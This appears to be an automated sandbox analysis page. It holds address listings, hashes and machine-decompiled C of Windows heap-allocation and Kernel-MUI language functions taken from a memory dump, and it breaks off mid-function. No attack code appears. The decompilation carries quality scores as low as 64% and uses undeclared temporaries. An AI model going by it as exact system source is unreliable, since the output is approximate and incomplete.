                                                                                                                          0x00a32066
                                                                                                                          0x00a32068
                                                                                                                          0x00a32073
                                                                                                                          0x00a32073
                                                                                                                          0x00a32073
                                                                                                                          0x00a32078
                                                                                                                          0x00a32079
                                                                                                                          0x00a3207d
                                                                                                                          0x00000000
                                                                                                                          0x00a3207d
                                                                                                                          0x009ea7b6
                                                                                                                          0x009ea440
                                                                                                                          0x009ea440
                                                                                                                          0x009ea440
                                                                                                                          0x009ea446
                                                                                                                          0x009ea44c
                                                                                                                          0x009ea44f
                                                                                                                          0x009ea453
                                                                                                                          0x009ea455
                                                                                                                          0x00a320b3
                                                                                                                          0x00a320b9
                                                                                                                          0x00a320b9
                                                                                                                          0x009ea45d
                                                                                                                          0x009ea460
                                                                                                                          0x009ea464
                                                                                                                          0x009ea466
                                                                                                                          0x009ea46b
                                                                                                                          0x009ea46f
                                                                                                                          0x009ea471
                                                                                                                          0x009ea471
                                                                                                                          0x009ea471
                                                                                                                          0x009ea474
                                                                                                                          0x009ea479
                                                                                                                          0x009ea47d
                                                                                                                          0x009ea47f
                                                                                                                          0x00a32229
                                                                                                                          0x00a3222f
                                                                                                                          0x009ea3c8
                                                                                                                          0x009ea3c8
                                                                                                                          0x009ea3ca
                                                                                                                          0x009ea3ca
                                                                                                                          0x00000000
                                                                                                                          0x009ea3ca
                                                                                                                          0x00a32235
                                                                                                                          0x00a3223a
                                                                                                                          0x00a3223a
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a32240
                                                                                                                          0x00a32246
                                                                                                                          0x00a3224a
                                                                                                                          0x00a32269
                                                                                                                          0x00a3226e
                                                                                                                          0x00a3224c
                                                                                                                          0x00a32261
                                                                                                                          0x00a32266
                                                                                                                          0x00a32274
                                                                                                                          0x00a32279
                                                                                                                          0x00a3227e
                                                                                                                          0x00a32286
                                                                                                                          0x00a32288
                                                                                                                          0x00a3228d
                                                                                                                          0x00a3228d
                                                                                                                          0x00a32292
                                                                                                                          0x00a32292
                                                                                                                          0x00a32295
                                                                                                                          0x00a32295
                                                                                                                          0x00000000
                                                                                                                          0x00a32295
                                                                                                                          0x009ea485
                                                                                                                          0x009ea489
                                                                                                                          0x009ea48b
                                                                                                                          0x009ea48f
                                                                                                                          0x009ea493
                                                                                                                          0x009ea497
                                                                                                                          0x009ea49b
                                                                                                                          0x009ea4bb
                                                                                                                          0x009ea4bb
                                                                                                                          0x009ea4bd
                                                                                                                          0x009ea4ff
                                                                                                                          0x009ea4ff
                                                                                                                          0x009ea501
                                                                                                                          0x009ea505
                                                                                                                          0x009ea50f
                                                                                                                          0x009ea517
                                                                                                                          0x009ea51b
                                                                                                                          0x009ea527
                                                                                                                          0x009ea52b
                                                                                                                          0x00a32182
                                                                                                                          0x00a32185
                                                                                                                          0x00a32193
                                                                                                                          0x00a32199
                                                                                                                          0x00a32199
                                                                                                                          0x009ea531
                                                                                                                          0x009ea535
                                                                                                                          0x009ea538
                                                                                                                          0x009ea548
                                                                                                                          0x009ea54b
                                                                                                                          0x009ea54d
                                                                                                                          0x009ea553
                                                                                                                          0x009ea559
                                                                                                                          0x00a32100
                                                                                                                          0x00a32103
                                                                                                                          0x00a32109
                                                                                                                          0x00a3210f
                                                                                                                          0x00a32112
                                                                                                                          0x00a32131
                                                                                                                          0x00a32136
                                                                                                                          0x00a32114
                                                                                                                          0x00a32129
                                                                                                                          0x00a3212e
                                                                                                                          0x00a3213c
                                                                                                                          0x00a32141
                                                                                                                          0x00a32147
                                                                                                                          0x00a3214d
                                                                                                                          0x00a32151
                                                                                                                          0x00a32154
                                                                                                                          0x00a32154
                                                                                                                          0x00a32159
                                                                                                                          0x00a32159
                                                                                                                          0x00a32103
                                                                                                                          0x009ea55f
                                                                                                                          0x009ea562
                                                                                                                          0x009ea565
                                                                                                                          0x009ea567
                                                                                                                          0x00a32162
                                                                                                                          0x009ea56d
                                                                                                                          0x009ea574
                                                                                                                          0x009ea575
                                                                                                                          0x009ea579
                                                                                                                          0x009ea57e
                                                                                                                          0x00a32169
                                                                                                                          0x00a3216a
                                                                                                                          0x00a32170
                                                                                                                          0x00a32175
                                                                                                                          0x00a32179
                                                                                                                          0x00a32179
                                                                                                                          0x009ea57e
                                                                                                                          0x009ea584
                                                                                                                          0x009ea58f
                                                                                                                          0x009ea58f
                                                                                                                          0x009ea52b
                                                                                                                          0x009ea5ad
                                                                                                                          0x009ea5bc
                                                                                                                          0x009ea5c1
                                                                                                                          0x009ea5c6
                                                                                                                          0x009ea5cb
                                                                                                                          0x009ea5cd
                                                                                                                          0x00a321a9
                                                                                                                          0x009ea5d3
                                                                                                                          0x009ea5d3
                                                                                                                          0x009ea5d3
                                                                                                                          0x009ea5d5
                                                                                                                          0x009ea5d8
                                                                                                                          0x00a321b3
                                                                                                                          0x00a321bc
                                                                                                                          0x00a321c2
                                                                                                                          0x00a321cd
                                                                                                                          0x00a321cf
                                                                                                                          0x00a321da
                                                                                                                          0x00a321da
                                                                                                                          0x00a321da
                                                                                                                          0x00a321f7
                                                                                                                          0x00a321f7
                                                                                                                          0x00a321c2
                                                                                                                          0x009ea5de
                                                                                                                          0x009ea5e3
                                                                                                                          0x009ea5e8
                                                                                                                          0x009ea5ea
                                                                                                                          0x00a3220a
                                                                                                                          0x009ea5f0
                                                                                                                          0x009ea5f0
                                                                                                                          0x009ea5f0
                                                                                                                          0x009ea5f2
                                                                                                                          0x009ea5f5
                                                                                                                          0x00a32219
                                                                                                                          0x00a3221b
                                                                                                                          0x00a3208c
                                                                                                                          0x00a3208c
                                                                                                                          0x00a3208c
                                                                                                                          0x00a32095
                                                                                                                          0x00a32096
                                                                                                                          0x00a32097
                                                                                                                          0x00a32098
                                                                                                                          0x00a320a4
                                                                                                                          0x00a320a5
                                                                                                                          0x00a320a9
                                                                                                                          0x00a320a9
                                                                                                                          0x00000000
                                                                                                                          0x009ea5f5
                                                                                                                          0x009ea4bf
                                                                                                                          0x009ea4d3
                                                                                                                          0x009ea4d8
                                                                                                                          0x009ea4da
                                                                                                                          0x00a31ede
                                                                                                                          0x00a31ede
                                                                                                                          0x00a31ee4
                                                                                                                          0x00a31ee9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a31f07
                                                                                                                          0x00000000
                                                                                                                          0x00a31f07
                                                                                                                          0x009ea4e0
                                                                                                                          0x009ea4e5
                                                                                                                          0x009ea4e7
                                                                                                                          0x00a320cb
                                                                                                                          0x009ea4ed
                                                                                                                          0x009ea4ed
                                                                                                                          0x009ea4ed
                                                                                                                          0x009ea4f2
                                                                                                                          0x009ea4f5
                                                                                                                          0x00a320d5
                                                                                                                          0x00a320de
                                                                                                                          0x00a320e4
                                                                                                                          0x00a320f6
                                                                                                                          0x00a320f6
                                                                                                                          0x00a320e4
                                                                                                                          0x009ea4fb
                                                                                                                          0x00000000
                                                                                                                          0x009ea4fb
                                                                                                                          0x009ea4a1
                                                                                                                          0x009ea4a4
                                                                                                                          0x009ea4a8
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea4aa
                                                                                                                          0x009ea4ac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea4b2
                                                                                                                          0x009ea4b5
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x009ea4b5
                                                                                                                          0x009ea43a
                                                                                                                          0x009ea340
                                                                                                                          0x009ea346
                                                                                                                          0x009ea600
                                                                                                                          0x00000000
                                                                                                                          0x009ea600
                                                                                                                          0x009ea34f
                                                                                                                          0x009ea351
                                                                                                                          0x009ea358
                                                                                                                          0x009ea3c6
                                                                                                                          0x00000000
                                                                                                                          0x009ea371
                                                                                                                          0x009ea37a
                                                                                                                          0x009ea37f
                                                                                                                          0x009ea382
                                                                                                                          0x009ea384
                                                                                                                          0x009ea394
                                                                                                                          0x00000000
                                                                                                                          0x009ea396
                                                                                                                          0x009ea399
                                                                                                                          0x009ea3a7
                                                                                                                          0x009ea3b0
                                                                                                                          0x009ea3b4
                                                                                                                          0x009ea3bb
                                                                                                                          0x009ea3d2
                                                                                                                          0x009ea3da
                                                                                                                          0x009ea3df
                                                                                                                          0x009ea3e1
                                                                                                                          0x009ea3e5
                                                                                                                          0x009ea3ea
                                                                                                                          0x009ea3f0
                                                                                                                          0x009ea3f0
                                                                                                                          0x009ea3e1
                                                                                                                          0x00000000
                                                                                                                          0x009ea3bb
                                                                                                                          0x009ea394

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: (!TrailingUCR)$((LONG)FreeEntry->Size > 1)$(LONG)FreeEntry->Size > 1$(UCRBlock != NULL)$HEAP: $HEAP[%wZ]:
                                                                                                                          • API String ID: 0-523794902
                                                                                                                          • Opcode ID: 8ca70851e4219b4e78527a1c61df406e3aad0fc4203b7eb28316b508325a900c
                                                                                                                          • Instruction ID: 496b60f66cc96fdd56f738a0c4cdf910d15c2bb7f86bb08d4c9a6a26a9c8d55e
                                                                                                                          • Opcode Fuzzy Hash: 8ca70851e4219b4e78527a1c61df406e3aad0fc4203b7eb28316b508325a900c
                                                                                                                          • Instruction Fuzzy Hash: 4642AE316087819FC716DF29C884B6ABBE5BF88704F18496DF4868B362D734ED85CB52
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 00A82D82, Relevance: 7.7, Strings: 6, Instructions: 228COMMONCrypto
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 64%
                                                                                                                          			E00A82D82(void* __ebx, intOrPtr* __ecx, signed int __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t83;
				signed char _t89;
				intOrPtr _t90;
				signed char _t101;
				signed int _t102;
				intOrPtr _t104;
				signed int _t105;
				signed int _t106;
				intOrPtr _t108;
				intOrPtr _t112;
				short* _t130;
				short _t131;
				signed int _t148;
				intOrPtr _t149;
				signed int* _t154;
				short* _t165;
				signed int _t171;
				void* _t182;

				_push(0x44);
				_push(0xaa0e80);
				E00A1D0E8(__ebx, __edi, __esi);
				_t177 = __edx;
				_t181 = __ecx;
				 *((intOrPtr*)(_t182 - 0x44)) = __ecx;
				 *((char*)(_t182 - 0x1d)) = 0;
				 *(_t182 - 0x24) = 0;
				if(( *(__ecx + 0x44) & 0x01000000) == 0) {
					 *((intOrPtr*)(_t182 - 4)) = 0;
					 *((intOrPtr*)(_t182 - 4)) = 1;
					_t83 = E009C40E1("RtlAllocateHeap");
					__eflags = _t83;
					if(_t83 == 0) {
						L48:
						 *(_t182 - 0x24) = 0;
						L49:
						 *((intOrPtr*)(_t182 - 4)) = 0;
						 *((intOrPtr*)(_t182 - 4)) = 0xfffffffe;
						E00A830C4();
						goto L50;
					}
					_t89 =  *(__ecx + 0x44) | __edx | 0x10000100;
					 *(_t182 - 0x28) = _t89;
					 *(_t182 - 0x3c) = _t89;
					_t177 =  *(_t182 + 8);
					__eflags = _t177;
					if(_t177 == 0) {
						_t171 = 1;
						__eflags = 1;
					} else {
						_t171 = _t177;
					}
					_t148 =  *((intOrPtr*)(_t181 + 0x94)) + _t171 &  *(_t181 + 0x98);
					__eflags = _t148 - 0x10;
					if(_t148 < 0x10) {
						_t148 = 0x10;
					}
					_t149 = _t148 + 8;
					 *((intOrPtr*)(_t182 - 0x48)) = _t149;
					__eflags = _t149 - _t177;
					if(_t149 < _t177) {
						L44:
						_t90 =  *[fs:0x30];
						__eflags =  *(_t90 + 0xc);
						if( *(_t90 + 0xc) == 0) {
							_push("HEAP: ");
							E009CB150();
						} else {
							E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push( *((intOrPtr*)(_t181 + 0x78)));
						E009CB150("Invalid allocation size - %Ix (exceeded %Ix)\n", _t177);
						goto L48;
					} else {
						__eflags = _t149 -  *((intOrPtr*)(_t181 + 0x78));
						if(_t149 >  *((intOrPtr*)(_t181 + 0x78))) {
							goto L44;
						}
						__eflags = _t89 & 0x00000001;
						if((_t89 & 0x00000001) != 0) {
							_t178 =  *(_t182 - 0x28);
						} else {
							E009DEEF0( *((intOrPtr*)(_t181 + 0xc8)));
							 *((char*)(_t182 - 0x1d)) = 1;
							_t178 =  *(_t182 - 0x28) | 0x00000001;
							 *(_t182 - 0x3c) =  *(_t182 - 0x28) | 0x00000001;
						}
						E00A84496(_t181, 0);
						_t177 = L009E4620(_t181, _t181, _t178,  *(_t182 + 8));
						 *(_t182 - 0x24) = _t177;
						_t173 = 1;
						E00A849A4(_t181);
						__eflags = _t177;
						if(_t177 == 0) {
							goto L49;
						} else {
							_t177 = _t177 + 0xfffffff8;
							__eflags =  *((char*)(_t177 + 7)) - 5;
							if( *((char*)(_t177 + 7)) == 5) {
								_t177 = _t177 - (( *(_t177 + 6) & 0x000000ff) << 3);
								__eflags = _t177;
							}
							_t154 = _t177;
							 *(_t182 - 0x40) = _t177;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *(_t177 + 3) - (_t154[0] ^ _t154[0] ^  *_t154);
								if(__eflags != 0) {
									_push(_t154);
									_t173 = _t177;
									E00A7FA2B(0, _t181, _t177, _t177, _t181, __eflags);
								}
							}
							__eflags =  *(_t177 + 2) & 0x00000002;
							if(( *(_t177 + 2) & 0x00000002) == 0) {
								_t101 =  *(_t177 + 3);
								 *(_t182 - 0x29) = _t101;
								_t102 = _t101 & 0x000000ff;
							} else {
								_t130 = E009C1F5B(_t177);
								 *((intOrPtr*)(_t182 - 0x30)) = _t130;
								__eflags =  *(_t181 + 0x40) & 0x08000000;
								if(( *(_t181 + 0x40) & 0x08000000) == 0) {
									 *_t130 = 0;
								} else {
									_t131 = E009F16C7(1, _t173);
									_t165 =  *((intOrPtr*)(_t182 - 0x30));
									 *_t165 = _t131;
									_t130 = _t165;
								}
								_t102 =  *(_t130 + 2) & 0x0000ffff;
							}
							 *(_t182 - 0x34) = _t102;
							 *(_t182 - 0x28) = _t102;
							__eflags =  *(_t181 + 0x4c);
							if( *(_t181 + 0x4c) != 0) {
								 *(_t177 + 3) =  *(_t177 + 2) ^  *(_t177 + 1) ^  *_t177;
								 *_t177 =  *_t177 ^  *(_t181 + 0x50);
								__eflags =  *_t177;
							}
							__eflags =  *(_t181 + 0x40) & 0x20000000;
							if(( *(_t181 + 0x40) & 0x20000000) != 0) {
								__eflags = 0;
								E00A84496(_t181, 0);
							}
							__eflags =  *(_t182 - 0x24) -  *0xab6360; // 0x0
							_t104 =  *[fs:0x30];
							if(__eflags != 0) {
								_t105 =  *(_t104 + 0x68);
								 *(_t182 - 0x4c) = _t105;
								__eflags = _t105 & 0x00000800;
								if((_t105 & 0x00000800) == 0) {
									goto L49;
								}
								_t106 =  *(_t182 - 0x34);
								__eflags = _t106;
								if(_t106 == 0) {
									goto L49;
								}
								__eflags = _t106 -  *0xab6364; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								__eflags =  *((intOrPtr*)(_t181 + 0x7c)) -  *0xab6366; // 0x0
								if(__eflags != 0) {
									goto L49;
								}
								_t108 =  *[fs:0x30];
								__eflags =  *(_t108 + 0xc);
								if( *(_t108 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(E00A6D455(_t181,  *(_t182 - 0x28)));
								_push( *(_t182 + 8));
								E009CB150("Just allocated block at %p for 0x%Ix bytes with tag %ws\n",  *(_t182 - 0x24));
								goto L34;
							} else {
								__eflags =  *(_t104 + 0xc);
								if( *(_t104 + 0xc) == 0) {
									_push("HEAP: ");
									E009CB150();
								} else {
									E009CB150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push( *(_t182 + 8));
								E009CB150("Just allocated block at %p for %Ix bytes\n",  *0xab6360);
								L34:
								_t112 =  *[fs:0x30];
								__eflags =  *((char*)(_t112 + 2));
								if( *((char*)(_t112 + 2)) != 0) {
									 *0xab6378 = 1;
									 *0xab60c0 = 0;
									asm("int3");
									 *0xab6378 = 0;
								}
								goto L49;
							}
						}
					}
				} else {
					_t181 =  *0xab5708; // 0x0
					 *0xabb1e0(__ecx, __edx,  *(_t182 + 8));
					 *_t181();
					L50:
					return E00A1D130(0, _t177, _t181);
				}
			}





















                                                                                                                          0x00a82d82
                                                                                                                          0x00a82d84
                                                                                                                          0x00a82d89
                                                                                                                          0x00a82d8e
                                                                                                                          0x00a82d90
                                                                                                                          0x00a82d92
                                                                                                                          0x00a82d97
                                                                                                                          0x00a82d9a
                                                                                                                          0x00a82da4
                                                                                                                          0x00a82dc0
                                                                                                                          0x00a82dc3
                                                                                                                          0x00a82dd1
                                                                                                                          0x00a82dd6
                                                                                                                          0x00a82dd8
                                                                                                                          0x00a830a7
                                                                                                                          0x00a830a7
                                                                                                                          0x00a830aa
                                                                                                                          0x00a830aa
                                                                                                                          0x00a830ad
                                                                                                                          0x00a830b4
                                                                                                                          0x00000000
                                                                                                                          0x00a830b9
                                                                                                                          0x00a82de3
                                                                                                                          0x00a82de8
                                                                                                                          0x00a82deb
                                                                                                                          0x00a82dee
                                                                                                                          0x00a82df1
                                                                                                                          0x00a82df3
                                                                                                                          0x00a82dfb
                                                                                                                          0x00a82dfb
                                                                                                                          0x00a82df5
                                                                                                                          0x00a82df5
                                                                                                                          0x00a82df5
                                                                                                                          0x00a82e04
                                                                                                                          0x00a82e0a
                                                                                                                          0x00a82e0d
                                                                                                                          0x00a82e11
                                                                                                                          0x00a82e11
                                                                                                                          0x00a82e12
                                                                                                                          0x00a82e15
                                                                                                                          0x00a82e18
                                                                                                                          0x00a82e1a
                                                                                                                          0x00a83027
                                                                                                                          0x00a83027
                                                                                                                          0x00a8302d
                                                                                                                          0x00a83030
                                                                                                                          0x00a8304f
                                                                                                                          0x00a83054
                                                                                                                          0x00a83032
                                                                                                                          0x00a83047
                                                                                                                          0x00a8304c
                                                                                                                          0x00a8305a
                                                                                                                          0x00a83063
                                                                                                                          0x00000000
                                                                                                                          0x00a82e20
                                                                                                                          0x00a82e20
                                                                                                                          0x00a82e23
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82e29
                                                                                                                          0x00a82e2b
                                                                                                                          0x00a82e47
                                                                                                                          0x00a82e2d
                                                                                                                          0x00a82e33
                                                                                                                          0x00a82e38
                                                                                                                          0x00a82e3f
                                                                                                                          0x00a82e42
                                                                                                                          0x00a82e42
                                                                                                                          0x00a82e4e
                                                                                                                          0x00a82e5d
                                                                                                                          0x00a82e5f
                                                                                                                          0x00a82e62
                                                                                                                          0x00a82e66
                                                                                                                          0x00a82e6b
                                                                                                                          0x00a82e6d
                                                                                                                          0x00000000
                                                                                                                          0x00a82e73
                                                                                                                          0x00a82e73
                                                                                                                          0x00a82e76
                                                                                                                          0x00a82e7a
                                                                                                                          0x00a82e83
                                                                                                                          0x00a82e83
                                                                                                                          0x00a82e83
                                                                                                                          0x00a82e85
                                                                                                                          0x00a82e87
                                                                                                                          0x00a82e8a
                                                                                                                          0x00a82e8d
                                                                                                                          0x00a82e92
                                                                                                                          0x00a82e9c
                                                                                                                          0x00a82e9f
                                                                                                                          0x00a82ea1
                                                                                                                          0x00a82ea2
                                                                                                                          0x00a82ea6
                                                                                                                          0x00a82ea6
                                                                                                                          0x00a82e9f
                                                                                                                          0x00a82eab
                                                                                                                          0x00a82eaf
                                                                                                                          0x00a82edf
                                                                                                                          0x00a82ee2
                                                                                                                          0x00a82ee5
                                                                                                                          0x00a82eb1
                                                                                                                          0x00a82eb3
                                                                                                                          0x00a82eb8
                                                                                                                          0x00a82ebd
                                                                                                                          0x00a82ec4
                                                                                                                          0x00a82ed6
                                                                                                                          0x00a82ec6
                                                                                                                          0x00a82ec7
                                                                                                                          0x00a82ecc
                                                                                                                          0x00a82ecf
                                                                                                                          0x00a82ed2
                                                                                                                          0x00a82ed2
                                                                                                                          0x00a82ed9
                                                                                                                          0x00a82ed9
                                                                                                                          0x00a82ee8
                                                                                                                          0x00a82eeb
                                                                                                                          0x00a82eef
                                                                                                                          0x00a82ef2
                                                                                                                          0x00a82efe
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f04
                                                                                                                          0x00a82f06
                                                                                                                          0x00a82f0d
                                                                                                                          0x00a82f0f
                                                                                                                          0x00a82f13
                                                                                                                          0x00a82f13
                                                                                                                          0x00a82f1b
                                                                                                                          0x00a82f21
                                                                                                                          0x00a82f27
                                                                                                                          0x00a82f95
                                                                                                                          0x00a82f98
                                                                                                                          0x00a82f9b
                                                                                                                          0x00a82fa0
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fa6
                                                                                                                          0x00a82fa9
                                                                                                                          0x00a82fac
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fb2
                                                                                                                          0x00a82fb9
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fc3
                                                                                                                          0x00a82fca
                                                                                                                          0x00000000
                                                                                                                          0x00000000
                                                                                                                          0x00a82fd0
                                                                                                                          0x00a82fd6
                                                                                                                          0x00a82fd9
                                                                                                                          0x00a82ff8
                                                                                                                          0x00a82ffd
                                                                                                                          0x00a82fdb
                                                                                                                          0x00a82ff0
                                                                                                                          0x00a82ff5
                                                                                                                          0x00a8300e
                                                                                                                          0x00a8300f
                                                                                                                          0x00a8301a
                                                                                                                          0x00000000
                                                                                                                          0x00a82f29
                                                                                                                          0x00a82f29
                                                                                                                          0x00a82f2c
                                                                                                                          0x00a82f4b
                                                                                                                          0x00a82f50
                                                                                                                          0x00a82f2e
                                                                                                                          0x00a82f43
                                                                                                                          0x00a82f48
                                                                                                                          0x00a82f56
                                                                                                                          0x00a82f64
                                                                                                                          0x00a82f6c
                                                                                                                          0x00a82f6c
                                                                                                                          0x00a82f72
                                                                                                                          0x00a82f76
                                                                                                                          0x00a82f7c
                                                                                                                          0x00a82f83
                                                                                                                          0x00a82f89
                                                                                                                          0x00a82f8a
                                                                                                                          0x00a82f8a
                                                                                                                          0x00000000
                                                                                                                          0x00a82f76
                                                                                                                          0x00a82f27
                                                                                                                          0x00a82e6d
                                                                                                                          0x00a82da6
                                                                                                                          0x00a82dab
                                                                                                                          0x00a82db3
                                                                                                                          0x00a82db9
                                                                                                                          0x00a830bc
                                                                                                                          0x00a830c1
                                                                                                                          0x00a830c1

                                                                                                                          Strings
                                                                                                                          Memory Dump Source
                                                                                                                          • Source File: 00000003.00000002.462415723.00000000009A0000.00000040.00000001.sdmp, Offset: 009A0000, based on PE: true
                                                                                                                          Similarity
                                                                                                                          • API ID:
                                                                                                                          • String ID: HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just allocated block at %p for %Ix bytes$Just allocated block at %p for 0x%Ix bytes with tag %ws$RtlAllocateHeap
                                                                                                                          • API String ID: 0-1745908468
                                                                                                                          • Opcode ID: fc01089aa23a8dbf6b64525c5ab60e13d7e44468cc8940275986ca045640e6d3
                                                                                                                          • Instruction ID: edaaedcd39b374d362830ad0f436b71752d3229e435384b036935ee939555faa
                                                                                                                          • Opcode Fuzzy Hash: fc01089aa23a8dbf6b64525c5ab60e13d7e44468cc8940275986ca045640e6d3
                                                                                                                          • Instruction Fuzzy Hash: 8191F231A006409FCB22EFA8C455BBDBBF2FF89B14F18805DE4465B2A2C7369D42CB15
                                                                                                                          Uniqueness

                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                          Function 009D3D34, Relevance: 6.7, Strings: 5, Instructions: 435COMMON
                                                                                                                          Download Yara Rule
                                                                                                                          C-Code - Quality: 96%
                                                                                                                          			E009D3D34(signed int* __ecx) {
				signed int* _v8;
				char _v12;
				signed int* _v16;
				signed int* _v20;
				char _v24;
				signed int _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				signed int* _v48;
				signed int* _v52;
				signed int _v56;
				signed int _v60;
				char _v68;
				signed int _t140;
				signed int _t161;
				signed int* _t236;
				signed int* _t242;
				signed int* _t243;
				signed int* _t244;
				signed int* _t245;
				signed int _t255;
				void* _t257;
				signed int _t260;
				void* _t262;
				signed int _t264;
				void* _t267;
				signed int _t275;
				signed int* _t276;
				short* _t277;
				signed int* _t278;
				signed int* _t279;
				signed int* _t280;
				short* _t281;
				signed int* _t282;
				short* _t283;
				signed int* _t284;
				void* _t285;

				_v60 = _v60 | 0xffffffff;
				_t280 = 0;
				_t242 = __ecx;
				_v52 = __ecx;
				_v8 = 0;
				_v20 = 0;
				_v40 = 0;
				_v28 = 0;
				_v32 = 0;
				_v44 = 0;
				_v56 = 0;
				_t275 = 0;
				_v16 = 0;
				if(__ecx == 0) {
					_t280 = 0xc000000d;
					_t140 = 0;
					L50:
					 *_t242 =  *_t242 | 0x00000800;
					_t242[0x13] = _t140;
					_t242[0x16] = _v40;
					_t242[0x18] = _v28;
					_t242[0x14] = _v32;
					_t242[0x17] = _t275;
					_t242[0x15] = _v44;
					_t242[0x11] = _v56;
					_t242[0x12] = _v60;
					return _t280;
				}
				if(E009D1B8F(L"WindowsExcludedProcs",  &_v36,  &_v12,  &_v8) >= 0) {
					_v56 = 1;
					if(_v8 != 0) {
						L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v8);
					}
					_v8 = _t280;
				}
				if(E009D1B8F(L"Kernel-MUI-Number-Allowed",  &_v36,  &_v12,  &_v8) >= 0) {
					_v60 =  *_v8;
					L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _v8);
					_v8 = _t280;
				}
				if(E009D1B8F(L"Kernel-MUI-Language-Allowed",  &_v36,  &_v12,  &_v8) < 0) {
					L16:
					if(E009D1B8F(L"Kernel-MUI-Language-Disallowed",  &_v36,  &_v12,  &_v8) < 0) {
						L28:
						if(E009D1B8F(L"Kernel-MUI-Language-SKU",  &_v36,  &_v12,  &_v8) < 0) {
							L46:
							_t275 = _v16;
							L47:
							_t161 = 0;
							L48:
							if(_v8 != 0) {
								L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t161, _v8);
							}
							_t140 = _v20;
							if(_t140 != 0) {
								if(_t275 != 0) {
									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t275);
									_t275 = 0;
									_v28 = 0;
									_t140 = _v20;
								}
							}
							goto L50;
						}
						_t167 = _v12;
						_t255 = _v12 + 4;
						_v44 = _t255;
						if(_t255 == 0) {
							_t276 = _t280;
							_v32 = _t280;
						} else {
							_t276 = L009E4620(_t255,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t255);
							_t167 = _v12;
							_v32 = _t276;
						}
						if(_t276 == 0) {
							_v44 = _t280;
							_t280 = 0xc0000017;
							goto L46;
						} else {
							E00A0F3E0(_t276, _v8, _t167);
							_v48 = _t276;
							_t277 = E00A11370(_t276, 0x9a4e90);
							_pop(_t257);
							if(_t277 == 0) {
								L38:
								_t170 = _v48;
								if( *_v48 != 0) {
									E00A0BB40(0,  &_v68, _t170);
									if(L009D43C0( &_v68,  &_v24) != 0) {
										_t280 =  &(_t280[0]);
									}
								}
								if(_t280 == 0) {
									_t280 = 0;
									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _v32);
									_v44 = 0;
									_v32 = 0;
								} else {
									_t280 = 0;
								}
								_t174 = _v8;
								if(_v8 != 0) {
									L009E77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t280, _t174);
								}
								_v8 = _t280;
								goto L46;
							}
							_t243 = _v48;
							do {
								 *_t277 = 0;
								_t278 = _t277 + 2;
								E00A0BB40(_t257,  &_v68, _t243);
								if(L009D43C0( &_v68,  &_v24) != 0) {
									_t280 =  &(_t280[0]);
								}
								_t243 = _t278;
								_t277 = E00A11370(_t278, 0x9a4e90);
								_pop(_t257);
							} while (_t277 != 0);
							_v48 = _t243;
							_t242 = _v52;
							goto L38;
						}
					}
					_t191 = _v12;
					_t260 = _v12 + 4;
					_v28 = _t260;
					if(_t260 == 0) {
						_t275 = _t280;
						_v16 = _t280;
					} else {
						_t275 = L009E4620(_t260,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t260);
						_t191 = _v12;
						_v16 = _t275;
					}
					if(_t275 == 0) {
						_v28 = _t280;
						_t280 = 0xc0000017;
						goto L47;
					} else {
						E00A0F3E0(_t275, _v8, _t191);
						_t285 = _t285 + 0xc;
						_v48 = _t275;
						_t279 = _t280;
						_t281 = E00A11370(_v16, 0x9a4e90);
						_pop(_t262);
						if(_t281 != 0) {
							_t244 = _v48;
							do {
								 *_t281 = 0;
								_t282 = _t281 + 2;
								E00A0BB40(_t262,  &_v68, _t244);
								if(L009D43C0( &_v68,  &_v24) != 0) {
									_t279 =  &(_t279[0]);
								}
								_t244 = _t282;
								_t281 = E00A11370(_t282, 0x9a4e90);
								_pop(_t262);
							} while (_t281 != 0);
							_v48 = _t244;
							_t242 = _v52;
						}
						_t201 = _v48;
						_t280 = 0;
						if( *_v48 != 0) {
							E00A0BB40(_t262,  &_v68, _t201);
							if(L009D43C0( &_v68,  &_v24) != 0) {
								_t279 =  &(_t279[0]);
							}
						}
						if(_t279 == 0) {
